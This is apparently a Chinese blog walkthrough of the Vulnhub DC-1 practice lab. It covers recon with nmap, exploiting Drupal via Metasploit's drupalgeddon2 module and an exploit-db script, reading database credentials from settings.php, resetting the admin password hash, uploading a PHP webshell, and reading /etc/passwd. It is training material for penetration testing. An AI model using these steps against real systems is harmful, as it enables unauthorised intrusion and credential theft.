<!DOCTYPE HTML>
<html lang="zh-CN">


<head>
    <meta charset="utf-8">
    <meta name="keywords" content="Vulnhub靶机_DC-1, Home">
    <meta name="description" content="Vulnhub靶机_DC-1简介Vulnhub是一个提供各种漏洞环境的靶场平台，大部分环境是做好的虚拟机镜像文件，镜像预先设计了多种漏洞，需要使用VMware或者VirtualBox运行。每个镜像会有破解的目标，挑战的目标是获取操作系统的r">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="renderer" content="webkit|ie-stand|ie-comp">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <meta name="referrer" content="no-referrer-when-downgrade">
    <!-- Global site tag (gtag.js) - Google Analytics -->


    <title>Vulnhub靶机_DC-1 | Home</title>
    <link rel="icon" type="image/png" href="/favicon.png">

    <link rel="stylesheet" type="text/css" href="/libs/awesome/css/all.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/materialize/materialize.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/aos/aos.css">
    <link rel="stylesheet" type="text/css" href="/libs/animate/animate.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/lightGallery/css/lightgallery.min.css">
    <link rel="stylesheet" type="text/css" href="/css/matery.css">
    <link rel="stylesheet" type="text/css" href="/css/my.css">

    <script src="/libs/jquery/jquery-3.6.0.min.js"></script>

<meta name="generator" content="Hexo 5.4.0"><link rel="alternate" href="/atom.xml" title="Home" type="application/atom+xml">

<style>.github-emoji { position: relative; display: inline-block; width: 1.2em; min-height: 1.2em; overflow: hidden; vertical-align: top; color: transparent; }  .github-emoji > span { position: relative; z-index: 10; }  .github-emoji img, .github-emoji .fancybox { margin: 0 !important; padding: 0 !important; border: none !important; outline: none !important; text-decoration: none !important; user-select: none !important; cursor: auto !important; }  .github-emoji img { height: 1.2em !important; width: 1.2em !important; position: absolute !important; left: 50% !important; top: 50% !important; transform: translate(-50%, -50%) !important; user-select: none !important; cursor: auto !important; } .github-emoji-fallback { color: inherit; } .github-emoji-fallback img { opacity: 0 !important; }</style>
</head>




<body>
    <header class="navbar-fixed">
    <nav id="headNav" class="bg-color nav-transparent">
        <div id="navContainer" class="nav-wrapper container">
            <div class="brand-logo">
                <a href="/" class="waves-effect waves-light">
                    
                    <img src="/medias/logo.png" class="logo-img" alt="LOGO">
                    
                    <span class="logo-span">Home</span>
                </a>
            </div>
            

<a href="#" data-target="mobile-nav" class="sidenav-trigger button-collapse"><i class="fas fa-bars"></i></a>
<ul class="right nav-menu">
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/" class="waves-effect waves-light">
      
      <i class="fas fa-home" style="zoom: 0.6;"></i>
      
      <span>首页</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/tags" class="waves-effect waves-light">
      
      <i class="fas fa-tags" style="zoom: 0.6;"></i>
      
      <span>标签</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/categories" class="waves-effect waves-light">
      
      <i class="fas fa-bookmark" style="zoom: 0.6;"></i>
      
      <span>分类</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/archives" class="waves-effect waves-light">
      
      <i class="fas fa-archive" style="zoom: 0.6;"></i>
      
      <span>归档</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/about" class="waves-effect waves-light">
      
      <i class="fas fa-user-circle" style="zoom: 0.6;"></i>
      
      <span>关于</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/contact" class="waves-effect waves-light">
      
      <i class="fas fa-comments" style="zoom: 0.6;"></i>
      
      <span>留言板</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/friends" class="waves-effect waves-light">
      
      <i class="fas fa-address-book" style="zoom: 0.6;"></i>
      
      <span>友情链接</span>
    </a>
    
  </li>
  
  <li>
    <a href="#searchModal" class="modal-trigger waves-effect waves-light">
      <i id="searchIcon" class="fas fa-search" title="搜索" style="zoom: 0.85;"></i>
    </a>
  </li>
</ul>


<div id="mobile-nav" class="side-nav sidenav">

    <div class="mobile-head bg-color">
        
        <img src="/medias/logo.png" class="logo-img circle responsive-img">
        
        <div class="logo-name">Home</div>
        <div class="logo-desc">
            
            Never really desperate, only the lost of the soul.
            
        </div>
    </div>

    <ul class="menu-list mobile-menu-list">
        
        <li class="m-nav-item">
	  
		<a href="/" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-home"></i>
			
			首页
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/tags" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-tags"></i>
			
			标签
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/categories" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-bookmark"></i>
			
			分类
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/archives" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-archive"></i>
			
			归档
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/about" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-user-circle"></i>
			
			关于
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/contact" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-comments"></i>
			
			留言板
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/friends" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-address-book"></i>
			
			友情链接
		</a>
          
        </li>
        
        
        <li><div class="divider"></div></li>
        <li>
            <a href="https://github.com/aisibuhuipao/aisibuhuipao.github.io" class="waves-effect waves-light" target="_blank">
                <i class="fab fa-github-square fa-fw"></i>Fork Me
            </a>
        </li>
        
    </ul>
</div>


        </div>

        
            <style>
    .nav-transparent .github-corner {
        display: none !important;
    }

    .github-corner {
        position: absolute;
        z-index: 10;
        top: 0;
        right: 0;
        border: 0;
        transform: scale(1.1);
    }

    .github-corner svg {
        color: #0f9d58;
        fill: #fff;
        height: 64px;
        width: 64px;
    }

    .github-corner:hover .octo-arm {
        animation: a 0.56s ease-in-out;
    }

    .github-corner .octo-arm {
        animation: none;
    }

    @keyframes a {
        0%,
        to {
            transform: rotate(0);
        }
        20%,
        60% {
            transform: rotate(-25deg);
        }
        40%,
        80% {
            transform: rotate(10deg);
        }
    }
</style>

<a href="https://github.com/aisibuhuipao/aisibuhuipao.github.io" class="github-corner tooltipped hide-on-med-and-down" target="_blank"
   data-tooltip="Fork Me" data-position="left" data-delay="50">
    <svg viewBox="0 0 250 250" aria-hidden="true">
        <path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"></path>
        <path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2"
              fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"></path>
        <path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z"
              fill="currentColor" class="octo-body"></path>
    </svg>
</a>
        
    </nav>

</header>

    



<div class="bg-cover pd-header post-cover" style="background-image: url('/medias/featureimages/10.jpg')">
    <div class="container" style="right: 0px;left: 0px;">
        <div class="row">
            <div class="col s12 m12 l12">
                <div class="brand">
                    <h1 class="description center-align post-title">Vulnhub靶机_DC-1</h1>
                </div>
            </div>
        </div>
    </div>
</div>




<main class="container content">

    
    <!-- 文章内容详情 -->
<div id="artDetail">
    <div class="card">
        <div class="card-content article-info">
            <div class="row tag-cate">
                <div class="col s7">
                    
                    <div class="article-tag">
                        
                            <a href="/tags/Vulnhub%E9%9D%B6%E6%9C%BA/">
                                <span class="chip bg-color">Vulnhub靶机</span>
                            </a>
                        
                            <a href="/tags/%E6%B3%A8%E5%85%A5/">
                                <span class="chip bg-color">注入</span>
                            </a>
                        
                            <a href="/tags/%E6%B8%97%E9%80%8F/">
                                <span class="chip bg-color">渗透</span>
                            </a>
                        
                    </div>
                    
                </div>
                <div class="col s5 right-align">
                    
                </div>
            </div>

            <div class="post-info">
                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-minus fa-fw"></i>发布日期:&nbsp;&nbsp;
                    2021-03-01
                </div>
                

                

                
                <div class="info-break-policy">
                    <i class="far fa-file-word fa-fw"></i>文章字数:&nbsp;&nbsp;
                    2.3k
                </div>
                

                

                
                    <div id="busuanzi_container_page_pv" class="info-break-policy">
                        <i class="far fa-eye fa-fw"></i>阅读次数:&nbsp;&nbsp;
                        <span id="busuanzi_value_page_pv"></span>
                    </div>
				
            </div>
        </div>
        <hr class="clearfix">

        

        

        <div class="card-content article-card-content">
            <div id="articleContent">
                <h1 id="Vulnhub靶机-DC-1"><a href="#Vulnhub靶机-DC-1" class="headerlink" title="Vulnhub靶机_DC-1"></a>Vulnhub靶机_DC-1</h1><h3 id="简介"><a href="#简介" class="headerlink" title="简介"></a>简介</h3><p>Vulnhub是一个提供各种漏洞环境的靶场平台，大部分环境是做好的虚拟机镜像文件，镜像预先设计了多种漏洞，需要使用VMware或者VirtualBox运行。每个镜像会有破解的目标，挑战的目标是获取操作系统的root权限和查看flag.</p>
<p><strong>靶机下载地址：</strong><a target="_blank" rel="noopener" href="https://download.vulnhub.com/dc/DC-1.zip">https://download.vulnhub.com/dc/DC-1.zip</a></p>
<p>DC-1 是一个专门构建的易受攻击的实验室，旨在获得渗透测试领域的经验。共有五个flag，但最终目标是拿到root目录中的flag</p>
<p><strong>涉及漏洞：</strong><a target="_blank" rel="noopener" href="http://vulhub.org.cn/vuln/VH-CVE-2018-7600">CVE-2018-7600</a> <a target="_blank" rel="noopener" href="http://vulhub.org.cn/vuln/VH-CVE-2018-7600">CVE-2018-7600</a></p>
<p><strong>参考：</strong><a target="_blank" rel="noopener" href="https://www.anquanke.com/post/id/104697">CVE-2018-7600 Drupal核心远程代码执行漏洞分析</a> <a target="_blank" rel="noopener" href="https://research.checkpoint.com/2018/uncovering-drupalgeddon-2/">Uncovering Drupalgeddon 2</a></p>
<p><strong>攻击机：</strong>Kali/192.168.22.46</p>
<h3 id="一、信息收集"><a href="#一、信息收集" class="headerlink" title="一、信息收集"></a>一、信息收集</h3><p>运行部署好的虚拟机，提示需要账号密码，该靶机不提供密码需要自己去渗透提权</p>
<p><img src="https://raw.githubusercontent.com/aisibuhuipao/img/main/202202272005155.png" alt="image-20220227200520341"></p>
<p><strong>因不知道DC-1靶机的IP，所有我们需要将靶机和攻击机kali放在同一个局域网里面，将Kali的网络适配器使用<code>桥接模式</code></strong></p>
<h4 id="1-探测目标"><a href="#1-探测目标" class="headerlink" title="1.探测目标"></a>1.探测目标</h4><p><strong>使用arp-scan工具</strong></p>
<figure class="highlight plaintext"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"># 探测同一区域中存活主机</span><br><span class="line">arp-scan -l		# -l 表示使用网络接口</span><br><span class="line"></span><br><span class="line"># 也可以使用 netdiscover 工具探测存活的主机</span><br><span class="line">netdiscover -i eth0		# -i device 用于嗅探和注入数据包的网络接口</span><br><span class="line"></span><br><span class="line"># 两个工具, arp-scan 速度更快一些</span><br></pre></td></tr></tbody></table></figure>

<p><img src="https://raw.githubusercontent.com/aisibuhuipao/img/main/202202272119051.png" alt="image-20220227211906644"></p>
<h4 id="2-查看目标开放端口"><a href="#2-查看目标开放端口" class="headerlink" title="2.查看目标开放端口"></a>2.查看目标开放端口</h4><figure class="highlight plaintext"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br></pre></td><td class="code"><pre><span class="line"># 使用 nmap 扫描目标ip</span><br><span class="line">nmap -v -sV -sC -T4 -p- -oN map.log 192.168.22.23</span><br><span class="line"># -v 输出详细信息</span><br><span class="line"># -sV 扫描目标主机和端口上运行的软件的版本</span><br><span class="line"># -sC 根据端口识别的服务,调用默认脚本</span><br><span class="line"># -T4 扫描时, TCP每4秒发一次包</span><br><span class="line"># -p- 全端口扫描</span><br><span class="line"># -oN 将扫描结果输出到 map.log 文件中</span><br><span class="line"></span><br><span class="line"># map.log</span><br><span class="line"># Nmap 7.92 scan initiated Sun Feb 27 15:48:10 2022 as: nmap -T4 -v -sC -sV -p- -oN map.log 192.168.22.23</span><br><span class="line">Nmap scan report for 192.168.22.23</span><br><span class="line">Host is up (0.0012s latency).</span><br><span class="line">Not shown: 65531 closed tcp ports (reset)</span><br><span class="line">PORT      STATE SERVICE VERSION</span><br><span class="line">22/tcp    open  ssh     OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)</span><br><span class="line">| ssh-hostkey: </span><br><span class="line">|   1024 c4:d6:59:e6:77:4c:22:7a:96:16:60:67:8b:42:48:8f (DSA)</span><br><span class="line">|   2048 11:82:fe:53:4e:dc:5b:32:7f:44:64:82:75:7d:d0:a0 (RSA)</span><br><span class="line">|_  256 3d:aa:98:5c:87:af:ea:84:b8:23:68:8d:b9:05:5f:d8 (ECDSA)</span><br><span class="line">80/tcp    open  http    Apache httpd 2.2.22 ((Debian))</span><br><span class="line">|_http-server-header: Apache/2.2.22 (Debian)</span><br><span class="line">| http-robots.txt: 36 disallowed entries (15 shown)</span><br><span class="line">| /includes/ /misc/ /modules/ /profiles/ /scripts/ </span><br><span class="line">| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt </span><br><span class="line">| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt </span><br><span class="line">|_/LICENSE.txt /MAINTAINERS.txt</span><br><span class="line">|_http-generator: Drupal 7 (http://drupal.org)</span><br><span class="line">|_http-title: Welcome to Drupal Site | Drupal Site</span><br><span class="line">|_http-favicon: Unknown favicon MD5: B6341DFC213100C61DB4FB8775878CEC</span><br><span class="line">| http-methods: </span><br><span class="line">|_  Supported Methods: GET HEAD POST OPTIONS</span><br><span class="line">111/tcp   open  rpcbind 2-4 (RPC #100000)</span><br><span class="line">| rpcinfo: </span><br><span class="line">|   program version    port/proto  service</span><br><span class="line">|   100000  2,3,4        111/tcp   rpcbind</span><br><span class="line">|   100000  2,3,4        111/udp   rpcbind</span><br><span class="line">|   100000  3,4          111/tcp6  rpcbind</span><br><span class="line">|   100000  3,4          111/udp6  rpcbind</span><br><span class="line">|   100024  1          35518/udp6  status</span><br><span class="line">|   100024  1          42538/udp   status</span><br><span class="line">|   100024  1          47921/tcp6  status</span><br><span class="line">|_  100024  1          56753/tcp   status</span><br><span class="line">56753/tcp open  status  1 (RPC #100024)</span><br><span class="line">MAC Address: 00:0C:29:4E:A6:04 (VMware)</span><br><span class="line">Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel</span><br><span class="line"></span><br><span class="line">Read data files from: /usr/bin/../share/nmap</span><br><span class="line">Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .</span><br><span class="line"># Nmap done at Sun Feb 27 15:48:37 2022 -- 1 IP address (1 host up) scanned in 27.82 seconds</span><br></pre></td></tr></tbody></table></figure>

<p>可以看见, 目标主机开了80端口, 服务器是 apache 2.2.22 版本, 系统是 Debian</p>
<p><img src="https://raw.githubusercontent.com/aisibuhuipao/img/main/202202272130384.png" alt="image-20220227213011471"></p>
<h4 id="3-查看网页相关信息"><a href="#3-查看网页相关信息" class="headerlink" title="3.查看网页相关信息"></a>3.查看网页相关信息</h4><p>访问目标ip看看, <a target="_blank" rel="noopener" href="http://192.168.22.23/">http://192.168.22.23:80</a></p>
<p>使用浏览器插件<code>Wappalyzer</code>，这个插件可以检测网站的CMS，框架，服务器等信息，可以看到该网站使用CMS为<code>Drupal</code>，在网页界面和底部都能发现是Drupal</p>
<p><img src="https://raw.githubusercontent.com/aisibuhuipao/img/main/202202272133646.png" alt="image-20220227213313742"></p>
<h3 id="二、漏洞查找与利用"><a href="#二、漏洞查找与利用" class="headerlink" title="二、漏洞查找与利用"></a>二、漏洞查找与利用</h3><h4 id="漏洞查找"><a href="#漏洞查找" class="headerlink" title="漏洞查找"></a>漏洞查找</h4><p>使用Metasploit搜索Drupal</p>
<figure class="highlight plaintext"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"># 初始化 msfdb 并启动 msfconsole</span><br><span class="line">msfdb init &amp;&amp; msfconsole</span><br></pre></td></tr></tbody></table></figure>

<p><img src="https://raw.githubusercontent.com/aisibuhuipao/img/main/202202272137818.png" alt="image-20220227213754162"></p>
<figure class="highlight plaintext"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"># 搜索 Drupal 的漏洞</span><br><span class="line">search Drupal</span><br><span class="line"># 出现 Metasploit tip: View missing module options with show missing 表示成功启动.</span><br><span class="line"># 漏洞利用, 优先选择上面查到模块的Rank为excellent并且时间较新的模块，这里我使用的是第2个.</span><br><span class="line">$ use exploit/unix/webapp/drupal_drupalgeddon2</span><br><span class="line">$ show options</span><br><span class="line">$ set RHOSTS 192.168.22.23</span><br><span class="line">$ exploit 或者 run</span><br></pre></td></tr></tbody></table></figure>

<p><img src="E:/img/image-20220227214006912.png" alt="image-20220227214006912"></p>
<p><img src="https://raw.githubusercontent.com/aisibuhuipao/img/main/202202272146982.png" alt="image-20220227214535116"></p>
<figure class="highlight plaintext"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"># 这里看见第一个flag, 使用 cat 命令看一下</span><br><span class="line">$ cat flag1.txt</span><br><span class="line">Every good CMS needs a config file - and so du you</span><br><span class="line"># 翻译：每一个好的CMS都需要一个配置文件，你也一样.</span><br><span class="line"># 百度搜索 Drupal 的默认配置文件为 /var/www/sites/default/settings.php</span><br></pre></td></tr></tbody></table></figure>

<p><img src="https://raw.githubusercontent.com/aisibuhuipao/img/main/202202272150216.png" alt="image-20220227214826782"></p>
<p><img src="https://raw.githubusercontent.com/aisibuhuipao/img/main/202202272152514.png" alt="image-20220227215215479"></p>
<figure class="highlight plaintext"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"># cat 查看配置文件</span><br><span class="line">$ cat /var/www/sites/default/settings.php</span><br><span class="line"># 新开一个终端窗口准备连接数据库</span><br></pre></td></tr></tbody></table></figure>

<p><a target="_blank" rel="noopener" href="https://www.iteye.com/blog/justcoding-1407697">Drupal7的目录结构及术语</a></p>
<p><img src="https://raw.githubusercontent.com/aisibuhuipao/img/main/202202272156285.png" alt="image-20220227215640849"></p>
<figure class="highlight plaintext"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"># 在配置文件中看到第二个flag</span><br><span class="line">Brute force and dictionary attacks aren't the only ways to gain access (and you WILL need access). What can you do with these credentials?</span><br><span class="line">翻译: 蛮力和字典攻击并不是获得访问权的唯一方法（而且你将需要访问权）。你能用这些凭证做什么？</span><br><span class="line"># 还看见了数据库的帐号密码</span><br><span class="line">'username' =&gt; 'dbuser',</span><br><span class="line">'password' =&gt; 'R0ck3t',</span><br></pre></td></tr></tbody></table></figure>

<h4 id="三-获取交互式shell"><a href="#三-获取交互式shell" class="headerlink" title="三. 获取交互式shell"></a>三. 获取交互式shell</h4><figure class="highlight plaintext"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"># 使用python反弹一个交互式shell，然后登陆数据库</span><br><span class="line">$ python -c 'import pty; pty.spawn("/bin/bash")'</span><br><span class="line"></span><br><span class="line">$ mysql -u dbuser -p</span><br><span class="line">Enter password:R0ck3t</span><br></pre></td></tr></tbody></table></figure>

<p><img src="https://raw.githubusercontent.com/aisibuhuipao/img/main/202202272204062.png" alt="image-20220227220419777"></p>
<figure class="highlight plaintext"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"># 选择 drupaldb 数据库</span><br><span class="line">$ use drupaldb;</span><br><span class="line"># 查看 drupaldb 数据库的表</span><br><span class="line">$ show tables;</span><br><span class="line"># 发现有一个 users 表, 查看表中内容</span><br><span class="line">$ select * from users;</span><br><span class="line"># 发现了帐号和密码, 但是密码经过了 hash的加密</span><br></pre></td></tr></tbody></table></figure>

<p><img src="https://raw.githubusercontent.com/aisibuhuipao/img/main/202202272206465.png" alt="image-20220227220646909"></p>
<p><img src="https://raw.githubusercontent.com/aisibuhuipao/img/main/202202272207647.png" alt="image-20220227220750388"></p>
<p>修改admin用户的密码</p>
<p>参考：<a target="_blank" rel="noopener" href="http://drupalchina.cn/node/2128">忘记Drupal的管理员密码的解决办法</a></p>
<figure class="highlight plaintext"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"># 先退出数据库, 然后使用Drupal对数据库的加密方法，生成一个新密码，然后把新的密码更新到admin用户.</span><br><span class="line">加密脚本位置在/var/www/scripts/password-hash.sh下</span><br><span class="line">$ exit;</span><br><span class="line">$ php scripts/password-hash.sh 1234</span><br></pre></td></tr></tbody></table></figure>

<p><img src="https://raw.githubusercontent.com/aisibuhuipao/img/main/202202272214973.png" alt="image-20220227221428316"></p>
<figure class="highlight plaintext"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"># 重新连接数据库</span><br><span class="line">$ mysql -u dbuser -p</span><br><span class="line">Enter password:R0ck3t</span><br><span class="line"># 更新 admin 的密码</span><br><span class="line">$ update drupaldb.users set pass="$S$Dx/rebqAPRM7ear2cM69DQkpypHGqYS5YLUz02kSABUqECoyVJg9" where name="admin";</span><br></pre></td></tr></tbody></table></figure>

<p><img src="https://raw.githubusercontent.com/aisibuhuipao/img/main/202202272219107.png" alt="image-20220227221855105"></p>
<figure class="highlight plaintext"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"># 第二种方法还可以新增一个admin权限的用户, 在exploitdb中有一个针对Drupal 7版本的攻击脚本，可以增加一个admin权限的用户账号</span><br><span class="line"># 查看Drupal版本,确定Drupal版本为7.24</span><br><span class="line">$ cat /var/www/includes/bootstrap.inc | grep VERSION</span><br><span class="line"># 搜索攻击脚本并选择适合当前 Drupal 版本的脚本</span><br><span class="line">$ searchsploit drupal</span><br><span class="line">python /usr/share/exploitdb/exploits/php/webapps/34992.py -t http://192.168.22.23 -u admin1 -p admin1</span><br></pre></td></tr></tbody></table></figure>

<h4 id="第二种方法获取-shell"><a href="#第二种方法获取-shell" class="headerlink" title="第二种方法获取 shell"></a>第二种方法获取 shell</h4><figure class="highlight plaintext"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"># 使用 meterpreter 工具上传一句话马, 回到之前查看到数据库帐号密码的窗口, 使用命令 exit; 退出.</span><br><span class="line">$ exit;</span><br><span class="line">$ exit</span><br><span class="line"># 进入 meterpreter 工具交互窗口</span><br><span class="line">$ set RHOSTS 192.168.22.23</span><br><span class="line"># 在本机 kali 上 新建一个一句话马文件</span><br><span class="line">vim shell.php</span><br><span class="line"># 上传到目标服务器</span><br><span class="line">$ upload /root/Desktop/shell.php /var/www/shell.php</span><br></pre></td></tr></tbody></table></figure>

<p><img src="https://raw.githubusercontent.com/aisibuhuipao/img/main/202202272257606.png" alt="image-20220227225729483"></p>
<p><img src="https://raw.githubusercontent.com/aisibuhuipao/img/main/202202272303567.png" alt="image-20220227230129512"></p>
<p><img src="https://raw.githubusercontent.com/aisibuhuipao/img/main/202202272303194.png" alt="image-20220227230341638"></p>
<figure class="highlight plaintext"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"># 查看是否上传成功</span><br><span class="line">$ ls /var/www/</span><br><span class="line"># 蚁剑连接</span><br><span class="line">http://192.168.22.23/shell.php</span><br></pre></td></tr></tbody></table></figure>

<p><img src="E:/img/image-20220227230556370.png" alt="image-20220227230556370"></p>
<p><img src="https://raw.githubusercontent.com/aisibuhuipao/img/main/202202272308988.png" alt="image-20220227230745848"></p>
<p><img src="https://raw.githubusercontent.com/aisibuhuipao/img/main/202202272308721.png" alt="image-20220227230830455"></p>
<h4 id="输入用户名-密码【admin-1234或者admin1-admin1】，尝试登陆"><a href="#输入用户名-密码【admin-1234或者admin1-admin1】，尝试登陆" class="headerlink" title="输入用户名/密码【admin/1234或者admin1/admin1】，尝试登陆"></a>输入用户名/密码【admin/1234或者admin1/admin1】，尝试登陆</h4><p><img src="https://raw.githubusercontent.com/aisibuhuipao/img/main/202202272224895.png" alt="image-20220227222417841"></p>
<figure class="highlight plaintext"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"># 成功登陆,并在后台左上角的Find content中发现flag3</span><br><span class="line">Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow.</span><br><span class="line">翻译: 特殊的PERMS将有助于找到passwd--但你需要--执行该命令以找出如何获得阴影中的内容。</span><br></pre></td></tr></tbody></table></figure>

<p><img src="https://raw.githubusercontent.com/aisibuhuipao/img/main/202202272225755.png" alt="image-20220227222458249"></p>
<p><img src="https://raw.githubusercontent.com/aisibuhuipao/img/main/202202272226189.png" alt="image-20220227222627028"></p>
<figure class="highlight plaintext"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"># flag3的信息中提到了passwd和shadow,很明显就是/etc/passwd和/etc/shadow 还提到了find、perms、-exec，这几个是提权用的. </span><br><span class="line"># cat查看/etc/passwd和/etc/shadow 的内容</span><br><span class="line">$ cat /etc/passwd</span><br><span class="line"># 只查看末尾 3 行的内容</span><br><span class="line">$ tail -3 /etc/passwd</span><br><span class="line"># 没有权限查看/etc/shadow 的内容</span><br></pre></td></tr></tbody></table></figure>

<p><img src="https://raw.githubusercontent.com/aisibuhuipao/img/main/202202272230339.png" alt="image-20220227223009368"></p>
<p><img src="https://raw.githubusercontent.com/aisibuhuipao/img/main/202202272233453.png" alt="image-20220227223305329"></p>
